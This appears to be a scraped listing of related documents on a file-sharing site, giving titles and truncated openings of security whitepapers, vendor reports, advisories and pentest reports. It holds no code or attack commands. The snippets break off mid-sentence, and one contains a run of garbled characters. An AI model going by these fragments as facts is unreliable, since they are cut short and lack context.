More informationSECURITY TERMS: Advisory Backdoor - Blended Threat Blind Worm Bootstrapped Worm Bot Coordinated Scanning
SECURITY TERMS: Advisory - A formal notice to the public on the nature of security vulnerability. When security researchers discover vulnerabilities in software, they usually notify the affected vendor
More informationCybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix
Cybercrime myths, challenges and how to protect our business Vladimir Kantchev Managing Partner Service Centrix Agenda Cybercrime today Sources and destinations of the attacks Breach techniques How to
More informationSECURITY TRENDS & VULNERABILITIES REVIEW 2015
SECURITY TRENDS & VULNERABILITIES REVIEW 2015 Contents 1. Introduction...3 2. Executive summary...4 3. Inputs...6 4. Statistics as of 2014. Comparative study of results obtained in 2013...7 4.1. Overall
More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationDEFENSE THROUGHOUT THE VULNERABILITY LIFE CYCLE WITH ALERT LOGIC THREAT AND LOG MANAGER
DEFENSE THROUGHOUT THE VULNERABILITY LIFE CYCLE WITH ALERT LOGIC THREAT AND Introduction > New security threats are emerging all the time, from new forms of malware and web application exploits that target
More information2015 TRUSTWAVE GLOBAL SECURITY REPORT
2015 TRUSTWAVE GLOBAL SECURITY REPORT Rahul Samant Trustwave Australia WHY DO CYBERCRIMINALS DO WHAT THEY DO? 1,425% Return on Investment (ROI) Estimated ROI for a one-month ransomware campaign Based on
More informationTespok Kenya icsirt: Enterprise Cyber Threat Attack Targets Report
Tespok Kenya icsirt: Enterprise Cyber Threat Attack Targets Report About this Report This report was compiled and published by the Tespok icsirt in partnership with the Serianu Cyber Threat Intelligence
More informationFoundstone ERS remediation System
Expediting Incident Response with Foundstone ERS Foundstone Inc. August, 2003 Enterprise Risk Solutions Platform Supports Successful Response and Remediation Introduction The Foundstone Enterprise Risk
More informationNetwork and Host-based Vulnerability Assessment
Network and Host-based Vulnerability Assessment A guide for information systems and network security professionals 6600 Peachtree-Dunwoody Road 300 Embassy Row Atlanta, GA 30348 Tel: 678.443.6000 Toll-free:
More informationHow To Manage Web Content Management System (Wcm)
WEB CONTENT MANAGEMENT SYSTEM February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
More informationVulnerability-Focused Threat Detection: Protect Against the Unknown
Vulnerability-Focused Threat Detection: Protect Against the Unknown Vulnerabilities and threats are being discovered at a pace that traditional exploit-based attack detection technology cannot meet. Vulnerability-focused
More informationWhat s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.
What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things. AGENDA Current State of Information Security Data Breach Statics Data Breach Case Studies Why current
More informationPenetration Test Report
Penetration Test Report MegaCorp One August 10 th, 2013 Offensive Security Services, LLC 19706 One Norman Blvd. Suite B #253 Cornelius, NC 28031 United States of America Tel: 1-402-608-1337 Fax: 1-704-625-3787
More informationWhite Paper THE FOUR ATTACK VECTORS TO PREVENT OR DETECT RETAILER BREACHES. By James Christiansen, VP, Information Risk Management
White Paper THE FOUR ATTACK VECTORS TO PREVENT OR DETECT RETAILER BREACHES By James Christiansen, VP, Information Risk Management Executive Summary Security breaches in the retail sector are becoming more
More informationCOORDINATED THREAT CONTROL
APPLICATION NOTE COORDINATED THREAT CONTROL Interoperability of Juniper Networks IDP Series Intrusion Detection and Prevention Appliances and SA Series SSL VPN Appliances Copyright 2010, Juniper Networks,
More informationAlert (TA14-212A) Backoff Point-of-Sale Malware
Alert (TA14-212A) Backoff Point-of-Sale Malware Original release date: July 31, 2014 Systems Affected Point-of-Sale Systems Overview This advisory was prepared in collaboration with the National Cybersecurity
More informationProtect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities Protecting a business s IT infrastructure is complex. Take, for example, a retailer operating a standard multi-tier infrastructure
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More information2. From a control perspective, the PRIMARY objective of classifying information assets is to:
MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected
More information2016 Trends in Cybersecurity: A Quick Guide to the Most Important Insights in Security
2016 Trends in Cybersecurity: A Quick Guide to the Most Important Insights in Security For 10 years, Microsoft has been studying and analyzing the threat landscape of exploits, vulnerabilities, and malware.
More informationLocking down a Hitachi ID Suite server
Locking down a Hitachi ID Suite server 2016 Hitachi ID Systems, Inc. All rights reserved. Organizations deploying Hitachi ID Identity and Access Management Suite need to understand how to secure its runtime
More information76% Secunia Vulnerability Review. Key figures and facts from a global IT-Security perspective. Published February 26, 2014. secunia.
Secunia Vulnerability Review 2014 Key figures and facts from a global IT-Security perspective Published February 26, 2014 76% Browser Vulnerabilities 7540 893 7540 731 7540 727 7540 441 7540 208 7540 207
More informationelearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
More informationKASPERSKY SECURITY INTELLIGENCE SERVICES. EXPERT SERVICES. www.kaspersky.com
KASPERSKY SECURITY INTELLIGENCE SERVICES. EXPERT SERVICES www.kaspersky.com EXPERT SERVICES Expert Services from Kaspersky Lab are exactly that the services of our in-house experts, many of them global
More informationANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details
Sub: Supply, Installation, setup and testing of Tenable Network Security Nessus vulnerability scanner professional version 6 or latest for scanning the LAN, VLAN, VPN and IPs with 3 years License/Subscription
More informationBlack Box Penetration Testing For GPEN.KM V1.0 Month dd "#$!%&'(#)*)&'+!,!-./0!.-12!1.03!0045!.567!5895!.467!:;83!-/;0!383;!
Sample Penetration Testing Report Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$%&'#)*)&'+,-./0.-121.030045.5675895.467:;83-/;0383; th, yyyy A&0#0+4*M:+:#&*#0%+C:,#0+4N:
More informationUnderstanding ZDI: Separating Fact from Fiction WHITE PAPER
Understanding ZDI: Separating Fact from Fiction WHITE PAPER Contents Introduction... 1 Background... 1 Rise in Zero Day Vulnerabilities... 2 Enter the Zero Day Initiative (ZDI)... 2 The ZDI Process...
More informationWhy The Security You Bought Yesterday, Won t Save You Today
9th Annual Courts and Local Government Technology Conference Why The Security You Bought Yesterday, Won t Save You Today Ian Robertson Director of Information Security Michael Gough Sr. Risk Analyst About
More informationHow To Prevent Hacker Attacks With Network Behavior Analysis
E-Guide Signature vs. anomaly-based behavior analysis News of successful network attacks has become so commonplace that they are almost no longer news. Hackers have broken into commercial sites to steal
More information2012 North Dakota Information Technology Security Audit Vulnerability Assessment and Penetration Testing Summary Report
2012 North Dakota Information Technology Security Audit Vulnerability Assessment and Penetration Testing Summary Report 28 September 2012 Submitted to: Donald Lafleur IS Audit Manager ND State Auditor
More informationIBM Protocol Analysis Module
IBM Protocol Analysis Module The protection engine inside the IBM Security Intrusion Prevention System technologies. Highlights Stops threats before they impact your network and the assets on your network
More informationBarracuda Web Site Firewall Ensures PCI DSS Compliance
Barracuda Web Site Firewall Ensures PCI DSS Compliance E-commerce sales are estimated to reach $259.1 billion in 2007, up from the $219.9 billion earned in 2006, according to The State of Retailing Online
More informationBeyond Aurora s Veil: A Vulnerable Tale
Beyond Aurora s Veil: A Vulnerable Tale Derek Manky Cyber Security & Threat Research FortiGuard Labs October 26th, 2010: SecTor 2010 Toronto, CA Conficker: April Doomsday.. Meanwhile JBIG2 Zero Day PDF/SWF
More informationPassing PCI Compliance How to Address the Application Security Mandates
Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These
More informationTHREAT VISIBILITY & VULNERABILITY ASSESSMENT
THREAT VISIBILITY & VULNERABILITY ASSESSMENT Date: April 15, 2015 IKANOW Analysts: Casey Pence IKANOW Platform Build: 1.34 11921 Freedom Drive, Reston, VA 20190 IKANOW.com TABLE OF CONTENTS 1 Key Findings
More informationWHITEPAPER. Nessus Exploit Integration
Nessus Exploit Integration v2 Tenable Network Security has committed to providing context around vulnerabilities, and correlating them to other sources, such as available exploits. We currently pull information
More informationSANS Top 20 Critical Controls for Effective Cyber Defense
WHITEPAPER SANS Top 20 Critical Controls for Cyber Defense SANS Top 20 Critical Controls for Effective Cyber Defense JANUARY 2014 SANS Top 20 Critical Controls for Effective Cyber Defense Summary In a
More informationIBM Advanced Threat Protection Solution
IBM Advanced Threat Protection Solution Fabio Panada IBM Security Tech Sales Leader 1 Advanced Threats is one of today s key mega-trends Advanced Threats Sophisticated, targeted attacks designed to gain
More informationThe Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA
The Weakest Link: Mitigating Web Application Vulnerabilities webscurity White Paper webscurity Inc. Minneapolis, Minnesota USA January 25, 2007 Contents Executive Summary...3 Introduction...4 Target Audience...4
More informationSecurity Awareness For Website Administrators. State of Illinois Central Management Services Security and Compliance Solutions
Security Awareness For Website Administrators State of Illinois Central Management Services Security and Compliance Solutions Common Myths Myths I m a small target My data is not important enough We ve
More informationWeb Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
More informationIBM Managed Security Services Vulnerability Scanning:
IBM Managed Security Services August 2005 IBM Managed Security Services Vulnerability Scanning: Understanding the methodology and risks Jerry Neely Network Security Analyst, IBM Global Services Page 2
More informationSECURITY REIMAGINED SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM. Why Automated Analysis Tools are not Created Equal
WHITE PAPER SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM Why Automated Analysis Tools are not Created Equal SECURITY REIMAGINED CONTENTS Executive Summary...3 Introduction: The Rise
More informationProtecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall
Protecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall A FORTINET WHITE PAPER www.fortinet.com Introduction Denial of Service attacks are rapidly becoming a popular attack vector used
More informationUNCLASSIFIED. Briefing to Critical Infrastructure Sector Organizations on the Canadian Cyber Incident Response Centre (CCIRC)
Briefing to Critical Infrastructure Sector Organizations on the Canadian Cyber Incident Response Centre (CCIRC) Cyber in the News 1 Tactics, Techniques and Procedures These observed tactics, techniques
More informationCORE Security and the Payment Card Industry Data Security Standard (PCI DSS)
CORE Security and the Payment Card Industry Data Security Standard (PCI DSS) Addressing the PCI DSS with Predictive Security Intelligence Solutions from CORE Security CORE Security +1 617.399-6980 info@coresecurity.com
More informationWeb Application Worms & Browser Insecurity
Web Application Worms & Browser Insecurity Mike Shema Welcome Background Hacking Exposed: Web Applications The Anti-Hacker Toolkit Hack Notes: Web Security Currently working at Qualys
More informationSymantec enterprise security. Symantec Internet Security Threat Report April 2009. An important note about these statistics.
Symantec enterprise security Symantec Internet Security Threat Report April 00 Regional Data Sheet Latin America An important note about these statistics The statistics discussed in this document are based
More informationHow to Grow and Transform your Security Program into the Cloud
How to Grow and Transform your Security Program into the Cloud Wolfgang Kandek Qualys, Inc. Session ID: SPO-207 Session Classification: Intermediate Agenda Introduction Fundamentals of Vulnerability Management
More informationMicrosoft Security Intelligence Report volume 7 (January through June 2009)
Microsoft Security Intelligence Report volume 7 (January through June 2009) Key Findings Summary Volume 7 of the Microsoft Security Intelligence Report provides an in-depth perspective on malicious and
More informationA Decision Maker s Guide to Securing an IT Infrastructure
A Decision Maker s Guide to Securing an IT Infrastructure A Rackspace White Paper Spring 2010 Summary With so many malicious attacks taking place now, securing an IT infrastructure is vital. The purpose
More informationThe Prevalence of Flash Vulnerabilities on the Web
TECHNICAL BRIEF FLASH FLOODING The Prevalence of Flash Vulnerabilities on the Web Adobe Flash Player is a cross-platform, browser plugin that provides uncompromised viewing of expressive applications,
More informationETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
More informationIBM X-Force 2012 Cyber Security Threat Landscape
IBM X-Force 2012 Cyber Security Threat Landscape 1 2012 IBM Corporation Agenda Overview Marketing & Promotion Highlights from the 2011 IBM X-Force Trend and Risk Report New attack activity Progress in
More informationWEB APPLICATION VULNERABILITY STATISTICS (2013)
WEB APPLICATION VULNERABILITY STATISTICS (2013) Page 1 CONTENTS Contents 2 1. Introduction 3 2. Research Methodology 4 3. Summary 5 4. Participant Portrait 6 5. Vulnerability Statistics 7 5.1. The most
More informationThis session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.
The hidden risks of mobile applications This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit. To learn more about TraceSecurity visit www.tracesecurity.com
More informationStreamlining Web and Email Security
How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Streamlining Web and Email Security sponsored by Introduction to Realtime Publishers by Don Jones, Series Editor
More informationRational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
More informationReducing the Cost and Complexity of Web Vulnerability Management
WHITE PAPER: REDUCING THE COST AND COMPLEXITY OF WEB..... VULNERABILITY.............. MANAGEMENT..................... Reducing the Cost and Complexity of Web Vulnerability Management Who should read this
More informationDefending Against Cyber Attacks with SessionLevel Network Security
Defending Against Cyber Attacks with SessionLevel Network Security May 2010 PAGE 1 PAGE 1 Executive Summary Threat actors are determinedly focused on the theft / exfiltration of protected or sensitive
More informationCHAPTER 3 : INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC
: INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS 1 FIVE KEY RECOMMENDATIONS During 2014, NTT Group supported response efforts for a variety of incidents. Review of these engagements revealed some observations
More informationAdobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
More informationWhy should I care about PDF application security?
Why should I care about PDF application security? What you need to know to minimize your risk Table of contents 1: Program crashes present an opportunity for attack 2: Look for software that fully uses
More information[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks
TLP: GREEN Issue Date: 1.12.16 Threat Advisory: Continuous Uptick in SEO Attacks Risk Factor High The Akamai Threat Research Team has identified a highly sophisticated Search Engine Optimization (SEO)
More informationTop Five Data Security Trends Impacting Franchise Operators. Payment System Risk September 29, 2009
Top Five Data Security Trends Impacting Franchise Operators Payment System Risk September 29, 2009 Top Five Data Security Trends Agenda Data Security Environment Compromise Overview and Attack Methods
More informationPenetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
More informationThe Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding
More informationLast update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
More informationHow to achieve PCI DSS Compliance with Checkmarx Source Code Analysis
How to achieve PCI DSS Compliance with Checkmarx Source Code Analysis Document Scope This document aims to assist organizations comply with PCI DSS 3 when it comes to Application Security best practices.
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationEC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
More informationThe Essentials Series. PCI Compliance. sponsored by. by Rebecca Herold
The Essentials Series PCI Compliance sponsored by by Rebecca Herold Using PCI DSS Compliant Log Management to Identify Attacks from Outside the Enterprise...1 Outside Attacks Impact Business...1 PCI DSS
More informationCyber Essentials Scheme
Cyber Essentials Scheme Requirements for basic technical protection from cyber attacks June 2014 December 2013 Contents Contents... 2 Introduction... 3 Who should use this document?... 3 What can these
More informationITEC441- IS Security. Chapter 15 Performing a Penetration Test
1 ITEC441- IS Security Chapter 15 Performing a Penetration Test The PenTest A penetration test (pentest) simulates methods that intruders use to gain unauthorized access to an organization s network and
More informationCan Consumer AV Products Protect Against Critical Microsoft Vulnerabilities?
ANALYST BRIEF Can Consumer AV Products Protect Against Critical Microsoft Vulnerabilities? Author Randy Abrams Tested Products Avast Internet Security 7 AVG Internet Security 2012 Avira Internet Security
More informationAn Integrated CyberSecurity Approach for HEP Grids. Workshop Report. http://hpcrd.lbl.gov/hepcybersecurity/
An Integrated CyberSecurity Approach for HEP Grids Workshop Report http://hpcrd.lbl.gov/hepcybersecurity/ 1. Introduction The CMS and ATLAS experiments at the Large Hadron Collider (LHC) being built at
More information